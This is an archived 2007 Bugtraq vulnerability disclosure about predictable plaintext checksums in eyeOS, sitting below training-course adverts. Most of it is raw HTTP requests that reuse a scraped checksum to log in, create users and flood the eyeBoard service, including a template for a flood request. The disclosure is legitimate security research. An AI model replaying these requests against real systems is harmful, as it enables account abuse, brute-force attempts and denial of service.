Ethical Hacking

Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package.
Computer Forensics Training at InfoSec Institute

Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors.




Network Security Bugtraq
[Top] [All Lists]
<prev [Date] next>
[Advanced]
 <prev [Thread] next>

eyeOS checksum prediction

from [komarov] Network Security [Permanent Link]
Subject: eyeOS checksum prediction
Date: 27 Aug 2007 18:48:21 -0000 
Subject: eyeOS checksum prediction
Author: Andrej Komarov (komarov@itdefence.ru)

eyeOS operates with special intermediate checksums in plaintext. Without its 
validation it is impossible to make new actions (to login, start new services). 
There is way to predict eyeOS checksum. If it is automated from hackers side, 
it will make local Denial Of Service atack or user password stealing.

1. GET / HTTP/1.1

<body onload='sendMsg("758474843719")


2. POST /index.php?checknum=758474843719&msg=baseapp HTTP/1.1

HTTP/1.1 200 OK

        Date: Mon, 27 Aug 2007 18:58:21 GMT
        Server: Apache/2.2.3 (Debian) DAV/2    SVN/1.4.2 mod_ssl/2.2.3 
OpenSSL/0.9.8c mod_perl/2.0.2 Perl/v5.8.8
        Expires: Thu, 19 Nov 1981 08:52:00 GMT
        Cache-Control: no-store, no-cache, must-revalidate, post-check=0, 
pre-check=0
        Pragma: no-cache
        Keep-Alive: timeout=10, max=10
        Connection: Keep-Alive
        Transfer-Encoding: chunked
        Content-Type: text/xml

21db
<?xml version="1.0" encoding="UTF-8"?>
<eyeMessage>
<action>
        <task>createWidget</task>
        <position>
                <x>0</x>
                <y>0</y>
                <horiz>0</horiz>
                <vert>0</vert>
</position>
        <checknum>876029936871</checknum> (!) 
        <name>47631_wnd1</name>
        <father>eyeApps</father>

... widgets generation

3. 

POST /index.php?checknum=876029936871&msg=doLogin HTTP/1.1 (!)
Host: demo.eyeos.org
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.8.1.6) 
Gecko/20070725 Firefox/2.0.0.6
Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: ru-ru,ru;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip,deflate
Accept-Charset: windows-1251,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded;
Referer: http://demo.eyeos.org/
Content-Length: 117
Cookie: PHPSESSID=ad92920e4ab606df75b28702255a87c8
Pragma: no-cache
Cache-Control: no-cache

params=%3CeyeLogin_Username%3Edemo23%3C%2FeyeLogin_Username%3E%3CeyeLogin_Password%3Edemo23%3C%2FeyeLogin_Password%3E

4.

POST /index.php?checknum=876029936871&msg=successLogin HTTP/1.1
Host: demo.eyeos.org
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.8.1.6) 
Gecko/20070725 Firefox/2.0.0.6
Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: ru-ru,ru;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip,deflate
Accept-Charset: windows-1251,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded;
Referer: http://demo.eyeos.org/
Content-Length: 7
Cookie: PHPSESSID=ad92920e4ab606df75b28702255a87c8
Pragma: no-cache
Cache-Control: no-cache


<checknum>749058867402</checknum>


POST /index.php?checknum=432461038814&msg=Launch HTTP/1.1

POST /index.php?checknum=432461038814&msg=App_Clicked HTTP/1.1


On this method is based possible atacks:

- mass user registration
- bruteforce atacks
- flood atacks on eyeBoard service like:

POST /index.php?checknum=PREDICTID_checksum&msg=addMsg HTTP/1.1
params=%3Capp%3EeyeBoard%3C%2Fapp%3E
with additional values : params=%3CMessageB%3EYOUR_MESSAGE%3C%2FMessageB%3E












POST /index.php?checknum=326420826018&msg=doCreateUser HTTP/1.1
Host: 127.0.0.1:8080
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.8.1.6) 
Gecko/20070725 Firefox/2.0.0.6
Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: ru-ru,ru;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip,deflate
Accept-Charset: windows-1251,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded;
Referer: http://127.0.0.1:8080/
Content-Length: 161
Cookie: PHPSESSID=r9vivth7896gtbaj6bst0nlen7
Pragma: no-cache
Cache-Control: no-cache

params=%3CeyeLogin_newUser%3ESHALOMA%3C%2FeyeLogin_newUser%3E%3CeyeLogin_Pass1%3Eshaloma%3C%2FeyeLogin_Pass1%3E%3CeyeLogin_Pass2%3Eshaloma%3C%2FeyeLogin_Pass2%3E

-----------------------

POST /index.php?checknum=284626275746&msg=doLogin HTTP/1.1
Accept: */*
Accept-Language: ru
Referer: http://127.0.0.1:8080/index.php
Content-Type: application/x-www-form-urlencoded;
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 
1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.590; .NET CLR 3.5.20706)
Host: 127.0.0.1:8080
Content-Length: 105
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: PHPSESSID=sa3erabjgpcqnfn4k8eutgark0

params=%3CeyeLogin_Username%3E%3C%2FeyeLogin_Username%3E%3CeyeLogin_Password%3E%3C%2FeyeLogin_Password%3E
[More messages with this same subject...]




<Prev in Thread] Current Thread [Next in Thread>
  • eyeOS checksum prediction, komarov <=
Previous by Date:  ePersonnel_RC_2004 Remote File Bug, system-errrror
Next by Date:  BIND 8 EOL and BIND 8 DNS Cache Poisoning (Amit Klein, Trusteer), Amit Klein
Previous by Thread:  ePersonnel_RC_2004 Remote File Bug, system-errrror
Next by Thread:  BIND 8 EOL and BIND 8 DNS Cache Poisoning (Amit Klein, Trusteer), Amit Klein
Indexes:  [Date] [Thread] [Top] [All Lists]